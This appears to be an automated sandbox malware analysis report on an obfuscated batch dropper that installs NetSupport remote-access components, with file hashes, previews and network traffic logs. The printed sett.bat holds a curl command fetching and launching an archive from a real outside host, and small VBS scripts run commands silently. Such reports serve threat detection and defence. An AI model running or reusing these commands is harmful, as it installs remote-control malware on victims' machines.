                                                                                                                                  Preview:7z..'.....fG-.#.....%.......,.VV....N]...........&...@...ZtA.4..x=i...h.5.UBh.K....KB}"GA..........x.....6.c.8..V.>..3.3.~...b..X......W.b...w....ubQ...h[....`..3)....>......U..K..Y.0}(.g..7..brw..y..../3z.t...,.g.@...aJ......0K........'Q......s.2!.@..7.g..~....a..........V.N3....../Mr$.yL.N...CKu8."N.i......#w..Oc...!..6.c..0......%.?.0..:...d....F..n..!....zz..v.9W..UB.n0........w..P...JD......L&..^G.o..(D..`y..e.N.B/..l...&..L..,.$..3.l.<G....C.a5...S.70g}...s........;.....#.#BlO.....h.5....u...y......NUU...B..S.m.......Q..E.D...6.. K.r.E....A.8..J;...5..q..(......V#...'......)....,.M.I..s...*#j..s.%.Z$....n<.......a...53u.,....^o....7j...;.2....1.N)p..>........L....qK\..$....@U.....I.F@.E+*.....~......aI^...w....V.t..o...2U,".d.4.......}..<.L.U.....z..a..7u.U1..ua`.....T.7....a.$.....N;..t.Fa7...?..s9.....ICU...;.w..F.w.[A@x.....U.k.$..!D.......C$h.I.._.h*...q...T...mN|....?/.......us.>..M..+..h......yBF.-...S...?b.f)......L..8......{f

                                                                                                                                  C:\ProgramData\msvcr100.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):773968
                                                                                                                                  Entropy (8bit):6.901559811406837
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\nskbfltr.inf

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):328
                                                                                                                                  Entropy (8bit):4.93007757242403
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                                                                  C:\ProgramData\nsm_vpro.ini

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):46
                                                                                                                                  Entropy (8bit):4.532048032699691
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                  MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                  SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                  SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                  SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....

                                                                                                                                  C:\ProgramData\pcicapi.dll

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):33144
                                                                                                                                  Entropy (8bit):6.7376663312239256
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                                                                  MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                                                                  SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                                                                  SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                                                                  SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                                                                  Malicious:true
                                                                                                                                  Yara Hits:
                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\pcicapi.dll, Author: Joe Security
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\putty.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1647912
                                                                                                                                  Entropy (8bit):6.92723334837222
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:49152:TDXOPFJK9bbYF8paMB8QMy3bHwPXNg/7UyW+ekBeZmn:T0WhreNg/X
                                                                                                                                  MD5:F838FDAFD0881CF1E6040A07D78E840D
                                                                                                                                  SHA1:2A35456B2F67BD12905378BEB6EAF373F6A0D0D1
                                                                                                                                  SHA-256:FC6F9DBDF4B9F8DD1F5F3A74CB6E55119D3FE2C9DB52436E10BA07842E6C3D7C
                                                                                                                                  SHA-512:5C0389EB79E5C2638C0D770CDE1A5C56A237AA596503966D4F226A99F94531AF501F8BF4EFA00722E12998F73271E50D8C187F8E984125AFFE40B1AB231503B4
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....\c.........."......Z...p.................@.............................`......D.....`.............................................................X.......xl......(W...@..................................(......@...........(................................text...fY.......Z.................. ..`.rdata.......p.......^..............@..@.data....U...p.......^..............@....pdata..xl.......n...n..............@..@.00cfg..8....@......................@..@.gxfg...`*...P...,..................@..@.tls................................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc.......@... ..................@..B........................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\remcmdstub.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):63864
                                                                                                                                  Entropy (8bit):6.446503462786185
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                                                                                  MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                                                                                  SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                                                                                  SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                                                                                  SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\sett.bat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):244
                                                                                                                                  Entropy (8bit):5.295243778675648
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:CxBR2923f99oRfFlIw8UlLAHbKx48mfHF7IHF41923f9oHy:cnz3QfF0C0vZd7IlPd
                                                                                                                                  MD5:2B4E497F6819F1A086E87577EC30A575
                                                                                                                                  SHA1:D18BD50BB9DE3525E58AE2B3F3BAE9F5ECC0390A
                                                                                                                                  SHA-256:03E73F0415063DBF0061FC24AC4750EE8307FE73C8F18DA9A114ECFDD41C3C94
                                                                                                                                  SHA-512:4C31E0C9DB2BAC9ED377E227B27746F987A9223B7A8CE27D0DC9FEF79F69093614C63E1A6CE8F330D70D9519B1708B98FC36AA3C0BD9592A75CB39F2972CBE5F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:if not exist "C:\Users\user\AppData\Local\Temp/document.jpg" ( curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z" -o "C:\ProgramData\lol.7z" ) .."C:\Users\user\AppData\Local\Temp/lol.7z"..

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\loca[1].htm

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\client32.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):15
                                                                                                                                  Entropy (8bit):2.8402239289418514
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:yAcn:yV
                                                                                                                                  MD5:020DF0663B4F5741AD652976C4207B0B
                                                                                                                                  SHA1:50AAA69D3EA68A7B16AA8FCBD866A6598EC39392
                                                                                                                                  SHA-256:0B4688799BA0DF92A3730B63635CC57F19DF94357AE63850AB96771A5711A3E1
                                                                                                                                  SHA-512:A6CA0A74AC46AB3A42B61A534BD97D167DF6900627E9076D75C40744D9B87EF71C26C9D8C797D5B410BFEF8A7805B87DE81CCC9BB76743B69678C083E3B07AE9
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:47.1772,8.42719

                                                                                                                                  C:\Users\user\AppData\Local\Temp\b1.vbs

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):70
                                                                                                                                  Entropy (8bit):4.6987263671247135
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                                                                                                  MD5:A883AA8226B7A6328633EB161B7EFB85
                                                                                                                                  SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                                                                                                  SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                                                                                                  SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                                                                                                  C:\Users\user\AppData\Local\Temp\b2.vbs

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):70
                                                                                                                                  Entropy (8bit):4.6987263671247135
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                                                                                                  MD5:A883AA8226B7A6328633EB161B7EFB85
                                                                                                                                  SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                                                                                                  SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                                                                                                  SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                                                                                                  C:\Users\user\AppData\Local\Temp\b3.vbs

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):70
                                                                                                                                  Entropy (8bit):4.6987263671247135
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:FER/McVqQDDIgk7O+JF9Bv:FEREkqOMgkq+Lzv
                                                                                                                                  MD5:A883AA8226B7A6328633EB161B7EFB85
                                                                                                                                  SHA1:9493C6A36F9155D2C210E98582B7DEDC2E92987A
                                                                                                                                  SHA-256:EE218F8B91B270886DC87064F014AC734E0E80EC87214DCF149B436CCFA8B9DA
                                                                                                                                  SHA-512:A88DE3B82705C7170B21A12A76EA27A07D31F0C9A85A8F02FCAB2C5E42669F62A9B157E52DDA9CC497BCB93E3D11FCD5D47553B44BB4C018CE642E7A9694E678
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:CreateObject(Wscript.Shell).Run & WScrit.Arguments(0) & , 0, False ..

                                                                                                                                  \Device\ConDrv

                                                                                                                                  Download File
                                                                                                                                  Process:C:\ProgramData\7zz.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):668
                                                                                                                                  Entropy (8bit):5.0901633025236634
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:p5gXLDM+zWZiTkI0d4qHDaoK3dR6osPChYT1kmLB806GLYIQKI07Nx5:p5gXZWZiTFntj6lPHHNIIv5
                                                                                                                                  MD5:7DEE58EFC72A7C38D2AB6B84CB589D9D
                                                                                                                                  SHA1:05C4C7CB7236E085F1E3F068BE73DDB4B79B1F73
                                                                                                                                  SHA-256:CF53835CFCCDB818B641A2B6456F2CFEED69B3030BBD431069FF5E82E9501CAE
                                                                                                                                  SHA-512:A21050E022CCAC3A7038E09589FEAB6C7B851474C79DBB10E2DFDCE3F31F352F77FCC12B29DB8323EA4EB3FDABD65C9748F8A16C77485E77DB6234958720F31B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..7-Zip (A) 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18....Processing archive: C:\ProgramData\lol.7z....Extracting CacheDate.dat..Extracting CacheMD5.dat..Extracting CacheOther.dat..Extracting CacheURL.dat..Extracting NSM.ini..Extracting nsm_vpro.ini..Extracting nskbfltr.inf..Extracting NSM.LIC..Extracting client32.ini..Extracting HINTSS.txt..Extracting client32.exe..Extracting remcmdstub.exe..Extracting HTCTL32.DLL..Extracting msvcr100.dll..Extracting pcicapi.dll..Extracting PCICHEK.DLL..Extracting PCICL32.DLL..Extracting TCCTL32.DLL..Extracting putty.exe....Everything is Ok....Files: 19..Size: 7111941..Compressed: 2305650..

                                                                                                                                  \Device\Null

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\System32\reg.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2
                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:y:y
                                                                                                                                  MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                  SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                  SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                  SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:Unicode text, UTF-16, little-endian text, with very long lines (6291), with no line terminators
                                                                                                                                  Entropy (8bit):4.689468113177968
                                                                                                                                  TrID:
                                                                                                                                  • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                  • MP3 audio (1001/1) 33.33%
                                                                                                                                  File name:tUUPQygorhzFkIcHuB.bat
                                                                                                                                  File size:12'584 bytes
                                                                                                                                  MD5:d915e6d4a7e64a25bfe1717ac1f5b501
                                                                                                                                  SHA1:06e40f582d31d9d1b9d7817e26fd348859700800
                                                                                                                                  SHA256:6054f328f8d54d0a54f5e3b90cff020e139105eb5aa5a3be52c29dbea6289c30
                                                                                                                                  SHA512:785bd76f044137d7efaa81026d8bbefcaf5b12bbc7a371b8ffd2cd65392d957261f5d37b839a760c41c3e07fba3301e6cce2018457341a1070b6f361bb193f78
                                                                                                                                  SSDEEP:384:CsH2gXWsqXSObLUq/PAQG/6cZrQZDHluO/h24LdFmFZdtd3kvCAoz:CR/IQNxdmZdtd3kvCAoz
                                                                                                                                  TLSH:E0425A2C1AC10FCFB03AC816E563C53E1A8FB97E536FA4D77478B76548E2619E40E291
                                                                                                                                  File Content Preview:..&@cls&@set "Z.h.=80@rVvoMwZD3yu6jYEd5QOJXcfabhPq Tt9KCBHseglzxIRWpkim47Un1NAGLSF2".%Z.h.:~2,1%%Z.h.:~39,1%%Z.h.:~40,1%%Z.h.:~33,1%%Z.h.:~31,1%"%Z.h.:~36,1%%Z.h.:~22,1%.=%Z.h.:~31,1%%Z.h.:~47,1%%Z.h.:~57,1%%Z.h.:~56,1%%Z.h.:~35,1%%Z.h.:~37,1%%Z.h.:~55,1%

                                                                                                                                  File Icon

                                                                                                                                  Icon Hash:9686878b929a9886

                                                                                                                                  Network Behavior

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jul 18, 2023 17:37:05.826410055 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:05.826476097 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:05.826570988 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:05.844688892 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:05.844718933 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:05.978276014 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:05.978421926 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.047986984 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.048022032 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.048806906 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.054879904 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.096297026 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.174978971 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.175052881 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.175081015 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.175160885 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.175192118 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.175209999 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.175256014 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.175282001 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.175306082 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.175333977 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.175358057 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.240119934 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.240186930 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.240331888 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.240331888 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.240370035 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.240423918 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.241184950 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.241249084 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.241281986 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.241303921 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.241333008 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.241352081 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.241816044 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.241873026 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.241924047 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.241950989 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.241978884 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.242006063 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.299875021 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.299907923 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.300050974 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.300087929 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.300122976 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.300149918 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.300708055 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.300748110 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.300826073 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.300826073 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.300848961 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.300904036 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.301655054 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.301682949 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.301786900 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.301805019 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.301817894 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.301850080 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.302372932 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.302400112 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.302469969 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.302480936 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.302505970 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.302522898 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.302686930 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.302711964 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.302761078 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.302771091 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.302798986 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.302812099 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.355650902 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.355695963 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.355827093 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.355844021 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.355902910 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.356187105 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.356223106 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.356358051 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.356358051 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.356374025 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.356420040 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.357115984 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.357152939 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.357225895 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.357239008 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.357276917 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.357285023 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.359241962 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.359285116 CEST44349720188.127.225.160192.168.2.5
                                                                                                                                  Jul 18, 2023 17:37:06.359344006 CEST49720443192.168.2.5188.127.225.160
                                                                                                                                  Jul 18, 2023 17:37:06.359354973 CEST44349720188.127.225.160192.168.2.5
